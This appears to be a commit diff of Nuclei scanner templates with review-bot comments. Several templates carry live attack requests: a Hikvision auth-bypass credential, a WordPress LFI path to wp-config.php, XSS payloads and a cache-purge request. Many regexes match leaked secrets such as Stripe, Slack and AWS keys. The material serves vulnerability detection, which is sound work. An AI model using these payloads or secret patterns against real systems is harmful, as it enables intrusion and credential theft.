Noam Rathaus 2021-04-12 09:35:53 +03:00
commit ed8ea816eb
67 changed files with 958 additions and 96 deletions


@ -18,7 +18,8 @@ Nuclei Templates
<a href="#-contributions">Contributions</a> •
<a href="#-discussion">Discussion</a> •
<a href="#-community">Community</a> •
<a href="https://discord.gg/KECAGdH">Join Discord</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
</p>
----


@ -13,6 +13,7 @@ tags:
- "iot"
- "misc"
- "fuzz"
- "revision"
# files is a list of files to ignore template execution
# unless asked for by the user.


@ -18,7 +18,8 @@ Nuclei Templates
<a href="#-contributions">Contributions</a>
<a href="#-discussion">Discussion</a>
<a href="#-community">Community</a>
<a href="https://discord.gg/KECAGdH">Join Discord</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a>
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
</p>
----
@ -37,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 267 | vulnerabilities | 119 | exposed-panels | 117 |
| takeovers | 67 | exposures | 66 | technologies | 58 |
| misconfiguration | 54 | workflows | 27 | miscellaneous | 20 |
| default-logins | 21 | exposed-tokens | 9 | dns | 8 |
| cves | 270 | vulnerabilities | 121 | exposed-panels | 118 |
| takeovers | 67 | exposures | 71 | technologies | 60 |
| misconfiguration | 56 | workflows | 27 | miscellaneous | 20 |
| default-logins | 21 | exposed-tokens | 33 | dns | 8 |
| fuzzing | 7 | helpers | 6 | iot | 11 |
**82 directories, 889 files**.
**95 directories, 929 files**.
</td>
</tr>


@ -0,0 +1,24 @@
id: CVE-2017-7921
info:
name: Hikvision Authentication Bypass
author: princechaddha
severity: high
reference: https://www.cvedetails.com/cve/CVE-2017-7921/
tags: cve,cve2017,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"
matchers-condition: and
matchers:
- type: word
words:
- "<firmwareVersion>"
part: body
- type: word
words:
- "application/xml"
part: header
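Review bot: The `info` block has no `description:` saying what the request checks, and the matcher set has no `status` check, so any XML reply that merely mentions `<firmwareVersion>` satisfies it; add `- type: status` / `status:` / `- 200` next to the two word matchers, and a one-liner such as `description: Hikvision devices affected by CVE-2017-7921 expose /system/deviceInfo without valid authentication.` Style: `part: body` is placed after `words:` here while other templates in this commit (laravel-log-file, slack-user-token) put `part:` before `words:`; pick one order for new files.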


@ -35,6 +35,11 @@ requests:
<host-scan-reply>A</host-scan-reply>
</config-auth>
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers-condition: and
matchers:
@ -49,4 +54,9 @@ requests:
- "status_code_2 == 502"
- "status_code_2 == 503"
- "status_code_2 == 504"
condition: or
condition: or
- type: dsl
dsl:
- "status_code_3 == 200"
negative: true
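Review bot: The new negative matcher `status_code_3 == 200` carries no explanation, and a reader cannot tell from the hunk why a 200 from the added `GET /` request should veto the finding; it looks like a check that the service is no longer healthy after the earlier requests, which deserves a comment such as `# GET / must not still answer 200 after the previous requests; a healthy root page rules the finding out`. The `condition: or` line is printed twice at the hunk boundary, which suggests a whitespace-only change there. The `requests` block starts before the first hunk.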


@ -0,0 +1,27 @@
id: CVE-2018-7422
info:
name: WordPress Site Editor Plugin LFI
author: LuskaBol
severity: high
tags: cve,cve2018,wordpress,wp-plugin,lfi
description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
reference: https://www.exploit-db.com/exploits/44340
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200
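Review bot: The `description` is a single plain scalar of roughly 250 characters; the other templates in this commit with long text (CVE-2020-26073, CVE-2021-30151) use block scalars, so write it as `description: >-` with the sentence folded over two or three lines. `reference:` could likewise become a `|` block listing the exploit-db link and `https://nvd.nist.gov/vuln/detail/CVE-2018-7422`, matching the CVE-2021-30151 template.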


@ -7,9 +7,7 @@ info:
description: Web Port 1.19.1 allows XSS via the /log type parameter.
tags: cve,cve2019,xss
reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# reference:
software: https://webport.se/nedladdningar/
requests:
- method: GET
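Review bot: The new `software:` key under `info` is not one of the info fields used anywhere else in this commit (name, author, severity, description, reference, tags); depending on how strictly the loader validates `info`, it is silently ignored or rejected, so the vendor link is better kept where tooling expects it: `reference: |` followed by `- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS` and `- https://webport.se/nedladdningar/`. The same applies to `source:` in the CVE-2020-15500 template and `hackerone:` in unauthenticated-cache-purge. The `info` block starts before the hunk and `requests` continues past it.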


@ -2,7 +2,7 @@ id: CVE-2019-18394
info:
name: Openfire Full Read SSRF
author: pdteam - nuclei.projectdiscovery.io
author: pdteam
severity: critical
description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.
refrense: |
@ -17,4 +17,4 @@ requests:
matchers:
- type: word
words:
- <h1>Burp Collaborator Server</h1>
- <h1>Burp Collaborator Server</h1>
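Review bot: `refrense: |` at the end of the first hunk is a misspelling of `reference`, so the links under it are not recognized as references and the template effectively ships without any; the commit edits the neighbouring `author` line but leaves the key as is — change it to `reference: |`. The `info` block continues outside the hunk, and the second hunk appears to be a trailing-newline change only.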


@ -0,0 +1,30 @@
id: CVE-2020-15500
info:
name: TileServer GL Reflected XSS
author: Akash.C
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500
source: https://github.com/maptiler/tileserver-gl/issues/461
tags: cve,cve2020,xss,tileserver
requests:
- method: GET
path:
- '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
part: body
- '"><script>alert(document.domain);</script>'
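Review bot: In the third matcher, `part: body` sits between `words:` and its single list item, so `words:` is either empty or the document fails to parse, and the reflected payload is never compared (indentation is not visible in this view, but the header matcher in the same file puts `part:` before `words:`). Reorder to `- type: word` / `part: body` / `words:` with the `'"><script>alert(document.domain);</script>'` item beneath `words:`.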


@ -1,25 +0,0 @@
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
description: |
A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information.
The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens.
reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
tags: lfi,cve,cve2020,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
words:
- "root:[x*]:0:0:"
part: body


@ -0,0 +1,31 @@
id: CVE-2021-30151
info:
name: CVE-2021-30151
author: DhiyaneshDk
severity: low
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
reference: |
- https://github.com/mperham/sidekiq/issues/4852
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
tags: cve,cve2021,xss,sidekiq
requests:
- method: GET
path:
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover=\"alert('nuclei')"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
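Review bot: The request path sends `alert(nuclei)` but the body matcher looks for `alert('nuclei')` with quotes around the argument, so unless Sidekiq rewrites the value the word match never fires; align the two, e.g. `- "onmouseover=\"alert(nuclei)"`. `name: CVE-2021-30151` also just repeats the id; a descriptive name such as `name: Sidekiq Live-Poll Queue Name XSS` matches the other templates in this commit.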


@ -1,12 +1,10 @@
id: nagios-default-credentials
info:
name: Nagios Default Credentials Check
author: iamthefrogy
severity: high
tags: nagios,default-login
reference: https://www.nagios.org
requests:
- method: GET
path:
@ -23,4 +21,4 @@ requests:
words:
- 'Current Status'
- 'Reports'
condition: and
condition: and


@ -0,0 +1,22 @@
id: somfy-login
info:
name: Somfy Login Page
author: DhiyaneshDK
severity: info
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/m_login.htm'
matchers-condition: and
matchers:
- type: word
words:
- Home motion by Somfy
- type: status
status:
- 200


@ -1,9 +1,9 @@
id: amazon-mws-auth-token-value
id: amazon-mws-auth-token
info:
name: Amazon MWS Auth Token
author: puzzlepeaches
name: "Amazon MWS Auth Token"
severity: medium
severity: info
tags: token,aws
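Review bot: Renaming the id from `amazon-mws-auth-token-value` to `amazon-mws-auth-token` silently breaks anything that references the old id (workflow files, include or exclude lists), and `author: puzzlepeaches` appears only on the old side of the rendered hunk — if it is being dropped, keep the attribution. Quoting only this template's `name:` is also inconsistent with the unquoted names everywhere else in the commit. The `requests` block continues past the hunk.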
requests:


@ -0,0 +1,17 @@
id: amazon-sns-topic
info:
name: Amazon SNS Topic Disclosure
author: Ice3man
severity: info
tags: token,amazon
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'


@ -4,7 +4,7 @@ info:
name: AWS Access Key ID Value
author: Swissky
severity: info
tags: token,aws
tags: token,aws,amazon
requests:
- method: GET


@ -0,0 +1,18 @@
id: artifactory-api-password
info:
name: Artifactory Password Disclosure
author: Ice3man
severity: info
tags: token,artifactory
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}'
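Review bot: The leading `(?:\s|=|:|"|^)` group consumes the delimiter, so the extracted value carries a leading space, `=`, `:` or quote instead of just the key; the same pattern is used in artifactory-api-token. Nuclei's regex extractor can return a capture group, so wrap the key itself, `- '(?:\s|=|:|"|^)(AP[\dABCDEF][a-zA-Z0-9]{8,})'`, and set `group: 1` on the extractor (same change for the `AKC` pattern).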


@ -0,0 +1,18 @@
id: artifactory-api-token
info:
name: Artifactory API Token Disclosure
author: Ice3man
severity: info
tags: token,artifactory
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}'


@ -0,0 +1,18 @@
id: bitly-secret-key
info:
name: Bitly Secret Key Disclosure
author: Ice3man
severity: info
tags: token,bitly
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'R_[0-9a-f]{32}'


@ -0,0 +1,18 @@
id: cloudinary-credentials
info:
name: Cloudinary Credentials Disclosure
author: Ice3man
severity: info
tags: token,cloudinary
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+'


@ -0,0 +1,18 @@
id: discord-webhook
info:
name: Discord Webhook Disclosure
author: Ice3man
severity: info
tags: token,discord
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+'
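Review bot: The pattern is pinned to the `discordapp\.com` host, but webhook URLs are also issued on `discord.com`, so those are missed; `- 'https://discord(?:app)?\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+'` covers both.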


@ -10,14 +10,9 @@ requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- (K|k)ey(up|down|press)
negative: true
- type: dsl
dsl:
- regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
@ -26,6 +21,13 @@ requests:
- regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
- regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
- regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
- type: regex
part: body
regex:
- (K|k)ey(up|down|press)
negative: true
extractors:
- type: regex
part: body
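Review bot: In the character class `[\\-|_|A-Z0-9]` the `|` is a literal pipe, not an alternation, so every pattern in these dsl expressions also accepts `|` inside the key name and value; write it as `[\\-_A-Z0-9]`. `replace(toupper(body),"","")` replaces the empty string with the empty string and is a no-op — `toupper(body)` alone reads more clearly. Moving the negative `(K|k)ey(up|down|press)` matcher after the dsl matchers does not change the `and` result. The `requests` block starts before the first hunk and the extractor continues past the second.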


@ -0,0 +1,18 @@
id: jdbc-connection-string
info:
name: JDBC Connection String Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+'


@ -0,0 +1,18 @@
id: jwt-token
info:
name: JWT Token Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}'
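Review bot: The header and payload segments are limited to `[a-zA-Z0-9]`, but JWT segments are base64url and routinely contain `-` and `_`, so tokens whose header or payload includes either character are missed while the signature segment already allows them; use `[a-zA-Z0-9_\-]{10,}` for all three segments.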


@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/hopfully404"
extractors:
- type: regex
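Review bot: `hopfully404` is misspelled and, more to the point, nothing says why a deliberately non-existent path is requested; if the intent is that custom error pages can leak the same values as the home page, state it above the line: `# intentionally missing path: custom 404 pages sometimes embed the same keys`. The `requests` block starts before the hunk and the extractor continues past it.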


@ -0,0 +1,18 @@
id: google-calendar-link
info:
name: Google Calendar URI Disclosure
author: Ice3man
severity: info
tags: token,google
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+'


@ -0,0 +1,18 @@
id: google-oauth-access-key
info:
name: Google OAuth Access Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'ya29\.[0-9A-Za-z\-_]+'


@ -3,7 +3,7 @@ id: mailchimp-access-key-value
info:
name: Mailchimp API Value
author: puzzlepeaches
severity: medium
severity: info
tags: token,mailchimp
requests:


@ -0,0 +1,17 @@
id: microsoft-teams-webhook
info:
name: Microsoft Teams Webhook Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+'


@ -0,0 +1,17 @@
id: newrelic-admin-api-key
info:
name: Admin API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRAA-[a-f0-9]{27}'
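Review bot: `name: Admin API Key Disclosure` does not say which product the key belongs to, and the same holds for the Insights Keys, REST API Key and Synthetics Location Key templates; only the ids carry `newrelic`, so prefix the names, e.g. `name: New Relic Admin API Key Disclosure`. A `newrelic` entry in `tags:` would make the four selectable together as well.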


@ -0,0 +1,17 @@
id: newrelic-insights-key
info:
name: Insights Keys Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}'


@ -0,0 +1,17 @@
id: newrelic-rest-api-key
info:
name: REST API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRRA-[a-f0-9]{42}'


@ -0,0 +1,17 @@
id: newrelic-synthetics-location-key
info:
name: Synthetics Location Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}'


@ -0,0 +1,17 @@
id: braintree-access-token
info:
name: PayPal Braintree Access Token Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}'


@ -0,0 +1,17 @@
id: picatic-api-key
info:
name: Picatic API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'sk_live_[0-9a-z]{32}'
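Review bot: `sk_live_[0-9a-z]{32}` has no terminator and overlaps with the Stripe formats added in this commit (`sk_(?:live|test)_[0-9a-zA-Z]{24}` in stripe-secret-key), so a lowercase Stripe-style key of 32 or more characters is reported as both a Picatic and a Stripe key. Go's regexp has no lookaround, so the practical options are a consuming boundary with the key in a capture group and `group: 1`, or a `description:` that records the overlap so the two findings are not counted twice.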


@ -0,0 +1,17 @@
id: sendgrid-api-key
info:
name: Sendgrid API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}'


@ -1,28 +0,0 @@
id: slack-access-token
# xoxp-702234529XXX-688970480XXX-109182524XXXX-87fa5b4d2e62ac5c16fc6ea93bXXXXXX
# xoxb-702234529XXX-1076883857XXX-Ou9aRuvtFZ4DuTsepevXXXXX
info:
name: Slack access token
author: nadino
severity: medium
tags: token,slack
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
name: person-token
part: body
regex:
- "xoxp-[0-9A-Za-z\\-]{72}"
- type: regex
name: bot-token
part: body
regex:
- "xoxb-[0-9A-Za-z\\-]{51}"


@ -1,10 +1,10 @@
id: http-username-password
id: slack-bot-token
info:
name: Http usernamme password
name: Slack access token
author: nadino
severity: info
tags: token
tags: token,slack
requests:
- method: GET
@ -15,4 +15,4 @@ requests:
- type: regex
part: body
regex:
- '(ftp|ftps|http|https)://[A-Za-z0-9-_:\.~]+(@)'
- "xoxb-[0-9A-Za-z\\-]{51}"
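Review bot: Repurposing this file drops the `(ftp|ftps|http|https)://...@` detection of credentials embedded in URLs instead of adding a sibling, and if the file keeps its `http-username-password` name, id and file name now disagree. If the URL-credential check is meant to go away, a separate deletion (as this commit does for slack-access-token) makes that explicit; otherwise keep it and add slack-bot-token as a new file next to slack-user-token.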


@ -0,0 +1,18 @@
id: slack-user-token
info:
name: Slack User token disclosure
author: Ice3man
severity: info
tags: token,slack
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "xoxp-[0-9A-Za-z\\-]{72}"


@ -0,0 +1,18 @@
id: slack-webhook-token
info:
name: Slack Webhook Disclosure
author: Ice3man
severity: info
tags: token,slack
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}"
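Review bot: `T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}` fixes the team and bot ids at exactly nine characters, but newer Slack workspace and bot ids are longer, so their webhook URLs are not extracted; `{8,}` on both keeps the existing matches and admits the longer ids.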


@ -0,0 +1,17 @@
id: sonarqube-token
info:
name: SonarQube Token Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"
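Review bot: `sonar` is matched case-sensitively while the New Relic templates in the same commit use `(?i)`, and `.{0,50}` followed by any 40-hex string will also pick up git commit SHAs that sit within 50 characters of the word, which is common on SonarQube project pages; add `(?i)` for consistency and note the false-positive risk in a `description:` so reviewers of the output know to verify.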


@ -0,0 +1,17 @@
id: stripe-restricted-key
info:
name: Stripe Restricted Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'rk_(?:live|test)_[0-9a-zA-Z]{24}'


@ -0,0 +1,17 @@
id: stripe-secret-key
info:
name: Stripe Secret Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'sk_(?:live|test)_[0-9a-zA-Z]{24}'


@ -0,0 +1,17 @@
id: zapier-webhook-token
info:
name: Zapier Webhook Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'
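Review bot: In `(?:www.)?` the dot is unescaped and matches any character, unlike the escaped dots later in the same pattern; write `(?:www\.)?`.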


@ -0,0 +1,17 @@
id: zoho-webhook-token
info:
name: Zoho Webhook Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+'


@ -4,7 +4,7 @@ info:
name: Dockerrun AWS Configuration Exposure
author: pdteam
severity: medium
tags: config,exposure
tags: config,exposure,aws
requests:
- method: GET


@ -0,0 +1,27 @@
id: coremail-config-disclosure
info:
name: Coremail Config Disclosure
author: princechaddha
severity: high
reference: https://www.secpulse.com/archives/107611.html
tags: config,exposure
requests:
- method: GET
path:
- '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'
matchers-condition: and
matchers:
- type: word
words:
- "<object name=\"cm_md_db\">"
- 'containerDefinitions'
- '<string name="User">coremail</string>'
- '<string name="EnableCoremailSmtp">'
condition: or
- type: status
status:
- 200
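Review bot: `containerDefinitions` is a key from the Dockerrun AWS configuration format (the Dockerrun template touched in this commit covers it), not something a Coremail config dump contains, and with `condition: or` plus a 200 it is enough on its own to flag any host that echoes that word; drop it from the list. A short `description:` naming what `dumpConfig` exposes would also help triage.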


@ -1,9 +1,11 @@
id: laravel-env
info:
name: Laravel .env file
name: Laravel .env file accessible
author: pxmme1337 & dwisiswant0 & geeknik & emenalf
severity: medium
severity: critical
description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
reference: https://laravel.com/docs/master/configuration#environment-configuration
tags: config,exposure
requests:


@ -0,0 +1,25 @@
id: s3cmd-config
info:
name: S3CMD Configuration Disclosure
author: Ice3man
severity: info
tags: amazon,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/s3cmd.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[default]'
- 'access_key'
condition: and
- type: status
status:
- 200
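Review bot: The only path probed is `/s3cmd.ini`, which is the Windows file name; on Unix s3cmd reads `.s3cfg`, so if that is in scope add `- "{{BaseURL}}/.s3cfg"` to `path`. The tags use `amazon` where the Dockerrun template in the same commit gains `aws` and the aws-access-key template lists both; settle on `tags: aws,amazon,config,exposure` so the new templates are selectable together.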


@ -9,6 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/localhost.key"
- "{{BaseURL}}/host.key"
- "{{BaseURL}}/www.key"
- "{{BaseURL}}/private-key"


@ -0,0 +1,33 @@
id: yii-debugger
info:
name: View Yii Debugger Information
author: geeknik
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/debug/default/view.html"
- "{{BaseURL}}/debug/default/view"
- "{{BaseURL}}/frontend/web/debug/default/view"
- "{{BaseURL}}/web/debug/default/view"
- "{{BaseURL}}/sapi/debug/default/view"
redirects: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Yii Debugger</title>"
- "Status"
- "Route"
- "Log"
- "Time"
- "Memory"
- "DB"
condition: and
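Review bot: `info` has no `tags:` while every other new template in this commit has them, so this one cannot be selected or excluded by tag; add something like `tags: yii,debug,exposure`. A one-line `description:` saying that the Yii debug toolbar pages are reachable would match the documentation level of the Laravel templates added alongside it.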


@ -0,0 +1,27 @@
id: access-log-file
info:
name: Publicly accessible access-log file
author: sheikhrishad
severity: low
tags: log
requests:
- method: GET
path:
- "{{BaseURL}}/access.log"
matchers-condition: and
matchers:
- type: word
words:
- '"GET /'
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200


@ -8,6 +8,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/routes/error_log"
- "{{BaseURL}}/config/error_log"
- "{{BaseURL}}/error_log"
- "{{BaseURL}}/errors_log"
- "{{BaseURL}}/logs/error.log"
- "{{BaseURL}}/logs/errors.log"
- "{{BaseURL}}/log/error.log"
@ -21,7 +25,6 @@ requests:
- "{{BaseURL}}/admin/logs/error.log"
- "{{BaseURL}}/admin/logs/errors.log"
- "{{BaseURL}}/admin/log/error.log"
- "{{BaseURL}}/admin/logs/errors.log"
- "{{BaseURL}}/admin/error.log"
- "{{BaseURL}}/admin/errors.log"
- "{{BaseURL}}/{{Hostname}}/error.log"


@ -2,8 +2,10 @@ id: laravel-log-file
info:
name: Laravel log file publicly accessible
author: sheikhrishad
severity: low
author: sheikhrishad & geeknik
severity: high
description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information.
reference: https://laravel.com/docs/master/logging
tags: laravel,log,exposure
requests:
@ -14,10 +16,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "InvalidArgumentException"
condition: and
- "local.ERROR"
- "ErrorException"
- "syntax error"
condition: or
- type: word
part: header
words:
- "text/plain"
- "text/x-log"
condition: or
- type: status
status:
- 200
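Review bot: `syntax error` is a generic phrase and, OR-ed with the `text/plain` header check, turns any plain-text page that mentions it into a high-severity hit; keep `local.ERROR` (the Laravel log line prefix) as the discriminating word, either as its own required matcher or by dropping `syntax error` from the `or` list. The `requests` block starts before the second hunk.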


@ -0,0 +1,24 @@
id: laravel-telescope
info:
name: Laravel Telescope Disclosure
author: geeknik
description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more.
reference: https://laravel.com/docs/8.x/telescope
severity: medium
tags: laravel,disclosure,log
requests:
- method: GET
path:
- "{{BaseURL}}/telescope/requests"
redirects: true
matchers:
- type: word
words:
- "<title>Telescope</title>"
- "Requests"
- "Commands"
- "Schedule"
condition: and
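Review bot: The `description` is the product's own feature summary ("insight into the requests coming into your application…") rather than a statement of what the template finds; reword it to the finding, e.g. `description: The Laravel Telescope debug dashboard is reachable at /telescope/requests and exposes request, log, query and job details.` There is also no `status` matcher, so a redirected error page that happens to contain the four words would match; add `- type: status` / `status:` / `- 200` with `matchers-condition: and`.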


@ -0,0 +1,25 @@
id: aws-object-listing
info:
name: AWS bucket with Object listing
author: pdteam
severity: low
reference: https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29
tags: aws,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
part: body
- type: word
words:
- application/xml
part: header


@ -0,0 +1,27 @@
id: unauthenticated-cache-purge
info:
name: Varnish Unauthenticated Cache Purge
author: 0xelkomy
severity: low
description: As per guideline one should protect purges with ACLs from unauthorized hosts.
reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html
hackerone: https://hackerone.com/reports/154278
tags: varnish,misconfig,cache
requests:
- method: PURGE
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>200 Purged</title>'
- '"status": "ok"'
condition: or
- type: status
status:
- 200
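Review bot: `method: PURGE` against `{{BaseURL}}` is a state-changing request: where it succeeds it actually evicts the cached root object on the target, and nothing in `info` says so; extend the description, e.g. `description: Sends a PURGE for the root URL; a 200 "Purged" reply means the cache accepted the invalidation from an unauthorized host. Note that a successful check evicts the cached object.` The `hackerone:` key has the same non-standard-field problem as `software:` in the Web Port template.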


@ -0,0 +1,21 @@
id: openssh-5.3-detect
info:
name: OpenSSH 5.3 Detection
author: iamthefrogy
severity: low
tags: network,openssh
